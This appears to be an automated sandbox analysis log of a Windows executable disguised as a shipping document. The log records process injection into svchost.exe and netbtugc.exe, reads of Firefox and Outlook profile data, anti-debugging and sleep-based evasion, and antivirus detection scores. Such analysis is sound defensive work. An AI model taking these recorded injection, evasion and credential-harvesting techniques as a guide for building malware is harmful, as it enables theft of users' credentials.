Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E584F3 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E58AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E6B3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E7EF21 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E784D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E04FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | File created: C:\Users\user\AppData\Local\Temp\aut490B.tmp
Source: SHIPPING DOC MBL+HBL.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: netbtugc.exe, 00000006.00000002.3565934863.0000000003304000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2360663527.0000000003304000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SHIPPING DOC MBL+HBL.exe | ReversingLabs: Detection: 63%
Source: SHIPPING DOC MBL+HBL.exe | Virustotal: Detection: 35%
Source: unknown | Process created: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe"
Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe"
Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: SHIPPING DOC MBL+HBL.exeStatic file information: File size 1280512 > 1048576
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: SHIPPING DOC MBL+HBL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PrWIbKXhdqUKk.exe, 00000005.00000000.2047243039.0000000000E7E000.00000002.00000001.01000000.00000005.sdmp, PrWIbKXhdqUKk.exe, 00000008.00000002.3566947457.0000000000E7E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: SHIPPING DOC MBL+HBL.exe, 00000000.00000003.1709765778.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOC MBL+HBL.exe, 00000000.00000003.1708441812.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131532492.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2030952866.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131532492.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2029045752.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3567257954.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2127849653.000000000348F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2133475668.0000000003633000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3567257954.000000000397E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: SHIPPING DOC MBL+HBL.exe, 00000000.00000003.1709765778.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOC MBL+HBL.exe, 00000000.00000003.1708441812.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2131532492.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2030952866.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2131532492.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2029045752.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3567257954.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2127849653.000000000348F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2133475668.0000000003633000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3567257954.000000000397E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000003.2094708675.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2130361226.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000005.00000003.2064852940.00000000010BB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000003.2094708675.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2130361226.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000005.00000003.2064852940.00000000010BB000.00000004.00000001.00020000.00000000.sdmp
            Source: SHIPPING DOC MBL+HBL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: SHIPPING DOC MBL+HBL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: SHIPPING DOC MBL+HBL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: SHIPPING DOC MBL+HBL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: SHIPPING DOC MBL+HBL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E7C104 LoadLibraryA,GetProcAddress | 0_2_00E7C104
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E68538 push FFFFFF8Bh; iretd | 0_2_00E6853A
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E2E88F push edi; ret | 0_2_00E2E891
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E2E9A8 push esi; ret | 0_2_00E2E9AA
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E28AC5 push ecx; ret | 0_2_00E28AD8
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E2EB83 push esi; ret | 0_2_00E2EB85
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E2EC6C push edi; ret | 0_2_00E2EC6E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040A883 push FFFFFFC7h; retf | 1_2_0040AA9A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040AEA4 push cs; retf | 1_2_0040AEAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004036B0 push eax; ret | 1_2_004036B2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004087F2 push ecx; iretd | 1_2_004087FB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0320225F pushad ; ret | 1_2_032027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032027FA pushad ; ret | 1_2_032027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032309AD push ecx; mov dword ptr [esp], ecx | 1_2_032309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0320283D push eax; iretd | 1_2_03202858
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0320135E push eax; iretd | 1_2_03201369
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E04A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput | 0_2_00E04A35
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E853DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed | 0_2_00E853DF
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E23307 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00E23307
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | API/Special instruction interceptor: Address: FEAA1C
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0327096E rdtsc | 1_2_0327096E
            Source: C:\Windows\SysWOW64\netbtugc.exe | Window / User API: threadDelayed 9725
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes | graph_0-97847
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | API coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7768 | Thread sleep count: 247 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7768 | Thread sleep time: -494000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7768 | Thread sleep count: 9725 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7768 | Thread sleep time: -19450000s >= -30000s
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe TID: 7828 | Thread sleep time: -55000s >= -30000s
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe TID: 7828 | Thread sleep time: -31500s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E6449B GetFileAttributesW,FindFirstFileW,FindClose | 0_2_00E6449B
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E6C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 0_2_00E6C7E8
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E6C75D FindFirstFileW,FindClose | 0_2_00E6C75D
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E6F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00E6F021
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E6F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00E6F17E
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E6F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_00E6F47F
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E63833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00E63833
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E63B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00E63B56
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E6BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_00E6BD48
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E04AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_00E04AFE
            Source: netbtugc.exe, 00000006.00000002.3565934863.000000000328E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: PrWIbKXhdqUKk.exe, 00000008.00000002.3566544327.000000000075F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
            Source: firefox.exe, 00000009.00000002.2473975943.000002004A35C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | API call chain: ExitProcess graph end node | graph_0-96742
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | API call chain: ExitProcess graph end node | graph_0-97082
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0327096E rdtsc | 1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417703 LdrLoadDll | 1_2_00417703
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E7401F BlockInput | 0_2_00E7401F
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E03B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW | 0_2_00E03B4C
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E35BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer | 0_2_00E35BFC
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E7C104 LoadLibraryA,GetProcAddress | 0_2_00E7C104
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00FE9658 mov eax, dword ptr fs:[00000030h] | 0_2_00FE9658
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00FEACE8 mov eax, dword ptr fs:[00000030h] | 0_2_00FEACE8
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00FEAC88 mov eax, dword ptr fs:[00000030h] | 0_2_00FEAC88
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03308324 mov eax, dword ptr fs:[00000030h] | 1_2_03308324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03308324 mov ecx, dword ptr fs:[00000030h] | 1_2_03308324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03308324 mov eax, dword ptr fs:[00000030h] | 1_2_03308324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03308324 mov eax, dword ptr fs:[00000030h] | 1_2_03308324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h] | 1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h] | 1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h] | 1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322C310 mov ecx, dword ptr fs:[00000030h] | 1_2_0322C310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03250310 mov ecx, dword ptr fs:[00000030h] | 1_2_03250310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D437C mov eax, dword ptr fs:[00000030h] | 1_2_032D437C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] | 1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] | 1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] | 1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] | 1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] | 1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] | 1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] | 1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] | 1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] | 1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] | 1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] | 1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] | 1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] | 1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] | 1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] | 1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B035C mov eax, dword ptr fs:[00000030h] | 1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B035C mov eax, dword ptr fs:[00000030h] | 1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B035C mov eax, dword ptr fs:[00000030h] | 1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B035C mov ecx, dword ptr fs:[00000030h] | 1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B035C mov eax, dword ptr fs:[00000030h] | 1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B035C mov eax, dword ptr fs:[00000030h] | 1_2_032B035C
